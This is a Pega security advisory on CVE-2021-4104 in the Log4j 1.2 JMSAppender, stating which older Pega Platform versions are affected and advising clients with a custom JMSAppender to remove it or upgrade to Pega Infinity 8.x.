This Security Advisory was originally published to Pega Documentation on December 20, 2021. It was moved to the Pega Support Center on August 31, 2022.

A vulnerability was identified in the JMSAppender in Apache Log4j logging software version 1.2 (CVE-2021-4104).  This vulnerability would allow malicious actors to take control of organizational networks using Log4j.  The Log4j software is ubiquitously used by most organizations around the world.

This older version of Log4j is used in older Pega Platform versions prior to Version 7.3.  The standard file appenders and the prlogging.xml configuration file that ship with these older Pega Platform versions have been tested, and do not meet the configuration criteria defined by the CVE-2021-4104 vulnerability.  

Pega Cloud clients should not be able to edit this file and add their own appenders, so they do not meet the configuration criteria defined by the CVE-2021-4104 vulnerability.  

This issue does not require a hotfix from Pega.

For Pega clients who are using on-premises or self-managed cloud installations:  If a client has customized their prlogging.xml file and have added their own appender to that configuration (where that custom appender uses Pega’s shipped JMSAppender appender class), they may be vulnerable.  In this situation, clients are strongly urged to disable and remove that appender and use the standard console or file appenders that are shipped out-of-the-box.

Pega also strongly recommends that clients running on these older versions of Pega Platform upgrade to our current Pega Infinity (8.x) series, which has the latest security and functionality.